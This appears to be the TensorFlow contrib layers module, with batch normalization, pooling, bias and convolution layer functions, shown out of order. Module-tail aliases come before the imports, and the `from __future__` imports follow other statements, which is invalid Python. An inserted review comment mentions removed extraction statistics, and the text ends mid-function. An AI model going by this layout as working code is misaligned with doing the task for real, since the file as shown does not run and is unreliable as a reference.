    return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which bind the activation_fn parameter, removing it from
# the public signature.
elu = functools.partial(fully_connected, activation_fn=nn.elu)
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)
# Short-name aliases for the convolution ops.
conv2d = convolution2d
conv3d = convolution3d
conv2d_transpose = convolution2d_transpose
conv3d_transpose = convolution3d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
# NOTE(review): the four lines that previously appeared here ("| 43.469997",
# "| 95", "| 0.672857", "|") were not Python and not part of the original
# source; they are dataset-extraction statistics columns accidentally
# interleaved into the file, replaced by this note.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import six
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import convolutional as convolutional_layers
from tensorflow.python.layers import core as core_layers
from tensorflow.python.layers import normalization as normalization_layers
from tensorflow.python.layers import pooling as pooling_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training import moving_averages
from tensorflow.python.layers.maxout import maxout
# Public API of this module; everything else is an implementation detail.
__all__ = ['avg_pool2d',
           'avg_pool3d',
           'batch_norm',
           'bias_add',
           'conv2d',
           'conv3d',
           'conv2d_in_plane',
           'conv2d_transpose',
           'conv3d_transpose',
           'convolution',
           'convolution2d',
           'convolution2d_in_plane',
           'convolution2d_transpose',
           'convolution3d',
           'convolution3d_transpose',
           'dropout',
           'elu',
           'flatten',
           'fully_connected',
           'GDN',
           'gdn',
           'layer_norm',
           'linear',
           'pool',
           'max_pool2d',
           'max_pool3d',
           'one_hot_encoding',
           'relu',
           'relu6',
           'repeat',
           'scale_gradient',
           'separable_conv2d',
           'separable_convolution2d',
           'softmax',
           'spatial_softmax',
           'stack',
           'unit_norm',
           'legacy_fully_connected',
           'legacy_linear',
           'legacy_relu',
           'maxout']
# Canonical data-format strings accepted by the 2-D and 3-D ops below.
DATA_FORMAT_NCHW = 'NCHW'
DATA_FORMAT_NHWC = 'NHWC'
DATA_FORMAT_NCDHW = 'NCDHW'
DATA_FORMAT_NDHWC = 'NDHWC'
# Environment-variable opt-in that makes `batch_norm` default to the fused
# implementation when `fused` is not passed explicitly.
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
                           '').lower() in ('true', 't', '1')
@add_arg_scope
def avg_pool2d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NHWC,
               outputs_collections=None,
               scope=None):
  """Average-pools `inputs` over its two spatial dimensions.

  Args:
    inputs: A 4-D tensor in `NHWC` or `NCHW` layout, per `data_format`.
    kernel_size: Pooling window size (int or pair of ints).
    stride: Pooling stride (int or pair of ints).
    padding: `'VALID'` or `'SAME'`.
    data_format: `'NHWC'` (default) or `'NCHW'`.
    outputs_collections: Collections to add the output to.
    scope: Optional name scope.

  Returns:
    The pooled tensor.

  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with ops.name_scope(scope, 'AvgPool2D', [inputs]) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    channels_first = bool(data_format) and data_format.startswith('NC')
    pooled = pooling_layers.AveragePooling2D(
        pool_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format='channels_first' if channels_first else 'channels_last',
        _scope=sc).apply(tensor_in)
    return utils.collect_named_outputs(outputs_collections, sc, pooled)
@add_arg_scope
def avg_pool3d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NDHWC,
               outputs_collections=None,
               scope=None):
  """Average-pools `inputs` over its three spatial dimensions.

  Args:
    inputs: A 5-D tensor in `NDHWC` or `NCDHW` layout, per `data_format`.
    kernel_size: Pooling window size (int or triple of ints).
    stride: Pooling stride (int or triple of ints).
    padding: `'VALID'` or `'SAME'`.
    data_format: `'NDHWC'` (default) or `'NCDHW'`.
    outputs_collections: Collections to add the output to.
    scope: Optional name scope.

  Returns:
    The pooled tensor.

  Raises:
    ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`.
  """
  if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
    raise ValueError('data_format has to be either NCDHW or NDHWC.')
  with ops.name_scope(scope, 'AvgPool3D', [inputs]) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    channels_first = bool(data_format) and data_format.startswith('NC')
    pooled = pooling_layers.AveragePooling3D(
        pool_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format='channels_first' if channels_first else 'channels_last',
        _scope=sc).apply(tensor_in)
    return utils.collect_named_outputs(outputs_collections, sc, pooled)
def _fused_batch_norm(
    inputs,
    decay=0.999,
    center=True,
    scale=False,
    epsilon=0.001,
    activation_fn=None,
    param_initializers=None,
    updates_collections=ops.GraphKeys.UPDATE_OPS,
    is_training=True,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    data_format=DATA_FORMAT_NHWC,
    zero_debias_moving_mean=False,
    scope=None):
  """Internal batch-norm implementation backed by `nn.fused_batch_norm`.

  Called by `batch_norm` when the fused path is selected; see `batch_norm`
  for the meaning of the arguments. Only rank-2 and rank-4 inputs are
  supported: rank-2 inputs are temporarily reshaped to rank 4 so the fused
  kernel can be used, and reshaped back on the way out.

  Raises:
    ValueError: If `data_format` is not NCHW/NHWC, the input rank is not 2
      or 4, or the channel dimension is statically unknown.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with variable_scope.variable_scope(
      scope, 'BatchNorm', [inputs], reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    original_shape = inputs.get_shape()
    original_inputs = inputs
    original_rank = original_shape.ndims
    if original_rank is None:
      raise ValueError('Inputs %s has undefined rank' % inputs.name)
    elif original_rank not in [2, 4]:
      raise ValueError('Inputs %s has unsupported rank.'
                       ' Expected 2 or 4 but got %d' % (
                           inputs.name, original_rank))
    if original_rank == 2:
      # The fused kernel only handles 4-D inputs: insert two singleton
      # spatial dimensions around the channel axis.
      channels = inputs.get_shape()[-1].value
      if channels is None:
        raise ValueError('`C` dimension must be known but is None')
      new_shape = [-1, 1, 1, channels]
      if data_format == DATA_FORMAT_NCHW:
        new_shape = [-1, channels, 1, 1]
      inputs = array_ops.reshape(inputs, new_shape)
    inputs_shape = inputs.get_shape()
    dtype = inputs.dtype.base_dtype
    if data_format == DATA_FORMAT_NHWC:
      params_shape = inputs_shape[-1:]
    else:
      params_shape = inputs_shape[1:2]
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined `C` dimension %s.' %
                       (inputs.name, params_shape))
    # Allocate the beta/gamma parameters. When `center`/`scale` are off they
    # are replaced by constants so the fused op still has operands.
    trainable_beta = trainable and center
    beta_collections = utils.get_variable_collections(variables_collections,
                                                      'beta')
    if not param_initializers:
      param_initializers = {}
    if center:
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      beta = variables.model_variable(
          'beta',
          shape=params_shape,
          dtype=dtype,
          initializer=beta_initializer,
          collections=beta_collections,
          trainable=trainable_beta)
    else:
      beta = array_ops.constant(0.0, shape=params_shape)
    if scale:
      gamma_collections = utils.get_variable_collections(
          variables_collections, 'gamma')
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      gamma = variables.model_variable(
          'gamma',
          shape=params_shape,
          dtype=dtype,
          initializer=gamma_initializer,
          collections=gamma_collections,
          trainable=trainable)
    else:
      gamma = array_ops.constant(1.0, shape=params_shape)
    # Moving statistics are never trained directly; they are only updated via
    # `assign_moving_average` below.
    moving_mean_collections = utils.get_variable_collections(
        variables_collections, 'moving_mean')
    moving_mean_initializer = param_initializers.get(
        'moving_mean', init_ops.zeros_initializer())
    moving_mean = variables.model_variable(
        'moving_mean',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_mean_initializer,
        trainable=False,
        collections=moving_mean_collections)
    moving_variance_collections = utils.get_variable_collections(
        variables_collections, 'moving_variance')
    moving_variance_initializer = param_initializers.get(
        'moving_variance', init_ops.ones_initializer())
    moving_variance = variables.model_variable(
        'moving_variance',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_variance_initializer,
        trainable=False,
        collections=moving_variance_collections)
    def _fused_batch_norm_training():
      # Training path: the fused kernel computes batch statistics itself.
      return nn.fused_batch_norm(
          inputs, gamma, beta, epsilon=epsilon, data_format=data_format)
    def _fused_batch_norm_inference():
      # Inference path: normalize with the stored moving statistics.
      return nn.fused_batch_norm(
          inputs,
          gamma,
          beta,
          mean=moving_mean,
          variance=moving_variance,
          epsilon=epsilon,
          is_training=False,
          data_format=data_format)
    outputs, mean, variance = utils.smart_cond(is_training,
                                               _fused_batch_norm_training,
                                               _fused_batch_norm_inference)
    # If `is_training` doesn't have a constant value — because it is a
    # `Tensor`, a `Variable` or `Placeholder` — then is_training_value will
    # be None and `need_updates` will be true.
    is_training_value = utils.constant_value(is_training)
    need_updates = is_training_value is None or is_training_value
    if need_updates:
      if updates_collections is None:
        # No updates collection: force the moving-average updates to run as
        # control dependencies of the output itself.
        no_updates = lambda: outputs
        def _force_updates():
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          with ops.control_dependencies(
              [update_moving_mean, update_moving_variance]):
            return array_ops.identity(outputs)
        outputs = utils.smart_cond(is_training, _force_updates, no_updates)
      else:
        # Otherwise hand the update ops to the caller via the collection.
        moving_vars_fn = lambda: (moving_mean, moving_variance)
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          return update_moving_mean, update_moving_variance
        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
    outputs.set_shape(inputs_shape)
    if original_shape.ndims == 2:
      # Undo the temporary rank-2 -> rank-4 reshape from above.
      outputs = array_ops.reshape(outputs, array_ops.shape(original_inputs))
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def batch_norm(inputs,
               decay=0.999,
               center=True,
               scale=False,
               epsilon=0.001,
               activation_fn=None,
               param_initializers=None,
               param_regularizers=None,
               updates_collections=ops.GraphKeys.UPDATE_OPS,
               is_training=True,
               reuse=None,
               variables_collections=None,
               outputs_collections=None,
               trainable=True,
               batch_weights=None,
               fused=None,
               data_format=DATA_FORMAT_NHWC,
               zero_debias_moving_mean=False,
               scope=None,
               renorm=False,
               renorm_clipping=None,
               renorm_decay=0.99):
  """Adds a Batch Normalization layer.

  Normalizes `inputs` over the channel dimension using batch statistics
  during training and stored moving averages otherwise. There are three
  implementation paths: the fused kernel (`_fused_batch_norm`), the core
  `normalization_layers.BatchNormalization` class, and an in-module fallback
  that additionally supports `batch_weights` and `zero_debias_moving_mean`.

  Args:
    inputs: Tensor to normalize; channel axis selected by `data_format`.
    decay: Moving-average decay for the stored mean/variance.
    center: If True, learn a `beta` offset.
    scale: If True, learn a `gamma` scale.
    epsilon: Small constant added to the variance.
    activation_fn: Optional activation applied to the output.
    param_initializers: Optional dict of initializers keyed by
      'beta'/'gamma'/'moving_mean'/'moving_variance'.
    param_regularizers: Optional dict of regularizers for 'beta'/'gamma'.
    updates_collections: Collection for the moving-average update ops; if
      None, updates run as control dependencies of the output.
    is_training: Python bool or bool tensor selecting train/inference mode.
    reuse: Whether to reuse the variables in `scope`.
    variables_collections: Optional collections for the created variables.
    outputs_collections: Collections to add the output to.
    trainable: Whether beta/gamma are added to TRAINABLE_VARIABLES.
    batch_weights: Optional per-example weights for the moments
      (fallback path only).
    fused: If True (or env-enabled via `_FUSED_DEFAULT`), prefer the fused
      kernel when possible.
    data_format: 'NHWC' (default) or 'NCHW'.
    zero_debias_moving_mean: If True, zero-debias the moving mean
      (fallback path only).
    scope: Optional variable_scope.
    renorm/renorm_clipping/renorm_decay: Batch renormalization options
      (core-layer path only).

  Returns:
    The normalized (and optionally activated) tensor.

  Raises:
    ValueError: On unsupported `data_format`, unknown rank/channels, or
      `renorm` combined with fallback-only options.
  """
  # This environment variable is only used during the testing period of fused
  # batch norm and will be removed after that.
  if fused is None:
    fused = _FUSED_DEFAULT
  # Only use _fused_batch_norm if all of the following conditions are true:
  # (1) fused is set True;
  # (2) it is possible to use (currently it doesn't support batch weights,
  #     renorm, and only handles inputs of rank 2 or 4);
  # (3) a feature is requested that only the fused path implements:
  #     zero_debias_moving_mean, rank-2 inputs, or non-default
  #     updates_collections.
  inputs = ops.convert_to_tensor(inputs)
  rank = inputs.get_shape().ndims
  possible_to_fuse = batch_weights is None and not renorm and rank in [2, 4]
  if fused and possible_to_fuse and (
      zero_debias_moving_mean or rank == 2 or
      updates_collections is not ops.GraphKeys.UPDATE_OPS):
    return _fused_batch_norm(
        inputs,
        decay=decay,
        center=center,
        scale=scale,
        epsilon=epsilon,
        activation_fn=activation_fn,
        param_initializers=param_initializers,
        updates_collections=updates_collections,
        is_training=is_training,
        reuse=reuse,
        variables_collections=variables_collections,
        outputs_collections=outputs_collections,
        trainable=trainable,
        data_format=data_format,
        zero_debias_moving_mean=zero_debias_moving_mean,
        scope=scope)
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  layer_variable_getter = _build_variable_getter()
  with variable_scope.variable_scope(
      scope, 'BatchNorm', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    inputs = ops.convert_to_tensor(inputs)
    # Prefer the core layer class whenever the requested options allow it.
    if (batch_weights is None and
        updates_collections is ops.GraphKeys.UPDATE_OPS and
        not zero_debias_moving_mean):
      axis = 1 if data_format == DATA_FORMAT_NCHW else -1
      if not param_initializers:
        param_initializers = {}
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      moving_mean_initializer = param_initializers.get(
          'moving_mean', init_ops.zeros_initializer())
      moving_variance_initializer = param_initializers.get(
          'moving_variance', init_ops.ones_initializer())
      if not param_regularizers:
        param_regularizers = {}
      beta_regularizer = param_regularizers.get('beta')
      gamma_regularizer = param_regularizers.get('gamma')
      layer = normalization_layers.BatchNormalization(
          axis=axis,
          momentum=decay,
          epsilon=epsilon,
          center=center,
          scale=scale,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer,
          moving_mean_initializer=moving_mean_initializer,
          moving_variance_initializer=moving_variance_initializer,
          beta_regularizer=beta_regularizer,
          gamma_regularizer=gamma_regularizer,
          trainable=trainable,
          renorm=renorm,
          renorm_clipping=renorm_clipping,
          renorm_momentum=renorm_decay,
          name=sc.name,
          _scope=sc,
          _reuse=reuse,
          fused=fused)
      outputs = layer.apply(inputs, training=is_training)
      # Mirror the created variables into the user-requested collections.
      _add_variable_to_collections(
          layer.moving_mean, variables_collections, 'moving_mean')
      _add_variable_to_collections(
          layer.moving_variance, variables_collections, 'moving_variance')
      if layer.beta is not None:
        _add_variable_to_collections(layer.beta, variables_collections, 'beta')
      if layer.gamma is not None:
        _add_variable_to_collections(
            layer.gamma, variables_collections, 'gamma')
      if activation_fn is not None:
        outputs = activation_fn(outputs)
      return utils.collect_named_outputs(outputs_collections,
                                         sc.original_name_scope, outputs)
    # Fallback path below; it does not implement renorm.
    if renorm:
      raise ValueError('renorm is not supported with batch_weights, '
                       'updates_collections or zero_debias_moving_mean')
    inputs_shape = inputs.get_shape()
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    if batch_weights is not None:
      batch_weights = ops.convert_to_tensor(batch_weights)
      inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
      # Reshape batch weights so they broadcast across the non-batch axes.
      nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
      batch_weights = array_ops.reshape(batch_weights, nshape)
    if data_format == DATA_FORMAT_NCHW:
      moments_axes = [0] + list(range(2, inputs_rank))
      params_shape = inputs_shape[1:2]
      # For NCHW, params are explicitly reshaped to broadcast over the
      # spatial axes instead of relying on trailing-axis broadcasting.
      params_shape_broadcast = list(
          [1, inputs_shape[1].value] + [1 for _ in range(2, inputs_rank)])
    else:
      moments_axes = list(range(inputs_rank - 1))
      params_shape = inputs_shape[-1:]
      params_shape_broadcast = None
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined channels dimension %s.' % (
          inputs.name, params_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    beta, gamma = None, None
    if not param_initializers:
      param_initializers = {}
    if center:
      beta_collections = utils.get_variable_collections(variables_collections,
                                                        'beta')
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      beta = variables.model_variable('beta',
                                      shape=params_shape,
                                      dtype=dtype,
                                      initializer=beta_initializer,
                                      collections=beta_collections,
                                      trainable=trainable)
    if scale:
      gamma_collections = utils.get_variable_collections(variables_collections,
                                                         'gamma')
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      gamma = variables.model_variable('gamma',
                                       shape=params_shape,
                                       dtype=dtype,
                                       initializer=gamma_initializer,
                                       collections=gamma_collections,
                                       trainable=trainable)
    # Create the moving statistics with the partitioner disabled so they are
    # never sharded; the partitioner is restored afterwards.
    partitioner = variable_scope.get_variable_scope().partitioner
    try:
      variable_scope.get_variable_scope().set_partitioner(None)
      moving_mean_collections = utils.get_variable_collections(
          variables_collections, 'moving_mean')
      moving_mean_initializer = param_initializers.get(
          'moving_mean', init_ops.zeros_initializer())
      moving_mean = variables.model_variable(
          'moving_mean',
          shape=params_shape,
          dtype=dtype,
          initializer=moving_mean_initializer,
          trainable=False,
          collections=moving_mean_collections)
      moving_variance_collections = utils.get_variable_collections(
          variables_collections, 'moving_variance')
      moving_variance_initializer = param_initializers.get(
          'moving_variance', init_ops.ones_initializer())
      moving_variance = variables.model_variable(
          'moving_variance',
          shape=params_shape,
          dtype=dtype,
          initializer=moving_variance_initializer,
          trainable=False,
          collections=moving_variance_collections)
    finally:
      variable_scope.get_variable_scope().set_partitioner(partitioner)
    # If `is_training` doesn't have a constant value — because it is a
    # `Tensor`, a `Variable` or `Placeholder` — then is_training_value will
    # be None and `needs_moments` will be true.
    is_training_value = utils.constant_value(is_training)
    need_moments = is_training_value is None or is_training_value
    if need_moments:
      # Calculate the moments based on the individual batch.
      if batch_weights is None:
        if data_format == DATA_FORMAT_NCHW:
          mean, variance = nn.moments(inputs, moments_axes, keep_dims=True)
          mean = array_ops.reshape(mean, [-1])
          variance = array_ops.reshape(variance, [-1])
        else:
          mean, variance = nn.moments(inputs, moments_axes)
      else:
        if data_format == DATA_FORMAT_NCHW:
          mean, variance = nn.weighted_moments(inputs, moments_axes,
                                               batch_weights, keep_dims=True)
          mean = array_ops.reshape(mean, [-1])
          variance = array_ops.reshape(variance, [-1])
        else:
          mean, variance = nn.weighted_moments(inputs, moments_axes,
                                               batch_weights)
      moving_vars_fn = lambda: (moving_mean, moving_variance)
      if updates_collections is None:
        def _force_updates():
          """Internal function forces updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          with ops.control_dependencies([update_moving_mean,
                                         update_moving_variance]):
            return array_ops.identity(mean), array_ops.identity(variance)
        mean, variance = utils.smart_cond(is_training,
                                          _force_updates,
                                          moving_vars_fn)
      else:
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          return update_moving_mean, update_moving_variance
        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
        # Use computed moments during training and moving_vars otherwise.
        vars_fn = lambda: (mean, variance)
        mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
    else:
      mean, variance = moving_mean, moving_variance
    if data_format == DATA_FORMAT_NCHW:
      mean = array_ops.reshape(mean, params_shape_broadcast)
      variance = array_ops.reshape(variance, params_shape_broadcast)
      if beta is not None:
        beta = array_ops.reshape(beta, params_shape_broadcast)
      if gamma is not None:
        gamma = array_ops.reshape(gamma, params_shape_broadcast)
    # Compute batch_normalization.
    outputs = nn.batch_normalization(inputs, mean, variance, beta, gamma,
                                     epsilon)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def bias_add(inputs,
             activation_fn=None,
             initializer=init_ops.zeros_initializer(),
             regularizer=None,
             reuse=None,
             variables_collections=None,
             outputs_collections=None,
             trainable=True,
             data_format=DATA_FORMAT_NHWC,
             scope=None):
  """Adds a per-channel bias to `inputs`, creating a `biases` variable.

  Args:
    inputs: A tensor with a statically known rank and channel dimension.
    activation_fn: Optional activation applied after the bias add.
    initializer: Initializer for the `biases` variable.
    regularizer: Optional regularizer for the `biases` variable.
    reuse: Whether to reuse the variables in `scope`.
    variables_collections: Optional collections for the created variable.
    outputs_collections: Collections to add the output to.
    trainable: Whether `biases` is added to TRAINABLE_VARIABLES.
    data_format: 'NHWC' (default) or 'NCHW'.
    scope: Optional variable_scope.

  Returns:
    The biased (and optionally activated) tensor.

  Raises:
    ValueError: On bad `data_format`, unknown rank, non-4D NCHW input, or
      unknown channel dimension.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with variable_scope.variable_scope(scope, 'BiasAdd', [inputs],
                                     reuse=reuse) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    static_shape = tensor_in.get_shape()
    rank = static_shape.ndims
    if rank is None:
      raise ValueError('Dims of shape must be known but is None')
    if data_format == DATA_FORMAT_NCHW and rank != 4:
      raise ValueError('Data format NCHW only supports 4D Tensor')
    channel_axis = 1 if data_format == DATA_FORMAT_NCHW else -1
    num_features = static_shape[channel_axis].value
    if num_features is None:
      raise ValueError('`C` dimension must be known but is None')
    bias_collections = utils.get_variable_collections(variables_collections,
                                                      'biases')
    biases = variables.model_variable(
        'biases',
        shape=[num_features,],
        dtype=tensor_in.dtype.base_dtype,
        initializer=initializer,
        regularizer=regularizer,
        collections=bias_collections,
        trainable=trainable)
    outputs = nn.bias_add(tensor_in, biases, data_format=data_format)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
# TODO(jbms): change `rate` parameter to `dilation_rate` for consistency with
# underlying op.
@add_arg_scope
def convolution(inputs,
                num_outputs,
                kernel_size,
                stride=1,
                padding='SAME',
                data_format=None,
                rate=1,
                activation_fn=nn.relu,
                normalizer_fn=None,
                normalizer_params=None,
                weights_initializer=initializers.xavier_initializer(),
                weights_regularizer=None,
                biases_initializer=init_ops.zeros_initializer(),
                biases_regularizer=None,
                reuse=None,
                variables_collections=None,
                outputs_collections=None,
                trainable=True,
                scope=None):
  """Adds an N-D convolution with optional normalization and activation.

  The convolution dimensionality (1-D, 2-D or 3-D) is chosen from the rank
  of `inputs`. When `normalizer_fn` is given, the bias is skipped and the
  normalizer is applied to the convolution output instead.

  Args:
    inputs: A rank-3, rank-4 or rank-5 tensor (batch, spatial..., channels
      or batch, channels, spatial... per `data_format`).
    num_outputs: Number of output filters.
    kernel_size: Spatial kernel size (int or sequence).
    stride: Convolution stride (int or sequence).
    padding: 'SAME' or 'VALID'.
    data_format: One of None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW'.
    rate: Dilation rate (int or sequence).
    activation_fn: Optional activation; defaults to ReLU, None for linear.
    normalizer_fn: Optional normalization applied in place of biases.
    normalizer_params: Keyword arguments for `normalizer_fn`.
    weights_initializer: Initializer for the kernel.
    weights_regularizer: Optional kernel regularizer.
    biases_initializer: Initializer for the bias; None disables the bias.
    biases_regularizer: Optional bias regularizer.
    reuse: Whether to reuse the variables in `scope`.
    variables_collections: Optional collections for the created variables.
    outputs_collections: Collections to add the output to.
    trainable: Whether the variables are added to TRAINABLE_VARIABLES.
    scope: Optional variable_scope.

  Returns:
    The convolved (and optionally normalized/activated) tensor.

  Raises:
    ValueError: On invalid `data_format` or unsupported input rank.
  """
  if data_format not in [None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW']:
    raise ValueError('Invalid data_format: %r' % (data_format,))

  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases', 'kernel': 'weights'})

  with variable_scope.variable_scope(
      scope, 'Conv', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    inputs = ops.convert_to_tensor(inputs)
    input_rank = inputs.get_shape().ndims
    # Dispatch on rank: rank 3 -> 1-D conv, rank 4 -> 2-D, rank 5 -> 3-D.
    rank_to_layer_class = {
        3: convolutional_layers.Convolution1D,
        4: convolutional_layers.Convolution2D,
        5: convolutional_layers.Convolution3D,
    }
    if input_rank not in rank_to_layer_class:
      raise ValueError('Convolution not supported for input with rank',
                       input_rank)
    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    layer = rank_to_layer_class[input_rank](
        filters=num_outputs,
        kernel_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=df,
        dilation_rate=rate,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=inputs.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = layer.apply(inputs)

    # Mirror the created variables into the user-requested collections.
    _add_variable_to_collections(layer.kernel, variables_collections, 'weights')
    if layer.use_bias:
      _add_variable_to_collections(layer.bias, variables_collections, 'biases')
    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
# `convolution` dispatches on input rank, so the 2-D and 3-D names are plain
# aliases of the same implementation.
convolution2d = convolution
convolution3d = convolution
@add_arg_scope
def convolution2d_in_plane(
    inputs,
    kernel_size,
    stride=1,
    padding='SAME',
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Applies the same single-channel 2-D filter to every input channel.

  A `[kernel_h, kernel_w, 1, 1]` kernel is created, tiled across all input
  channels and applied via `nn.depthwise_conv2d`, so every channel is
  convolved "in plane" with an identical filter and the number of channels
  is preserved.

  Args:
    inputs: A rank-4 tensor; the last dimension is treated as channels
      (NHWC layout — this op has no data_format argument).
    kernel_size: Spatial kernel size (int or pair of ints).
    stride: Spatial stride (int or pair of ints).
    padding: 'SAME' or 'VALID'.
    activation_fn: Optional activation; defaults to ReLU.
    normalizer_fn: Optional normalization applied in place of biases.
    normalizer_params: Keyword arguments for `normalizer_fn`.
    weights_initializer: Initializer for the shared kernel.
    weights_regularizer: Optional kernel regularizer.
    biases_initializer: Initializer for the biases; None disables biases.
    biases_regularizer: Optional bias regularizer.
    reuse: Whether to reuse the variables in `scope`.
    variables_collections: Optional collections for the created variables.
    outputs_collections: Collections to add the output to.
    trainable: Whether the variables are added to TRAINABLE_VARIABLES.
    scope: Optional variable_scope.

  Returns:
    The filtered (and optionally normalized/activated) tensor.
  """
  with variable_scope.variable_scope(
      scope, 'ConvInPlane', [inputs], reuse=reuse) as sc:
    dtype = inputs.dtype.base_dtype
    kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
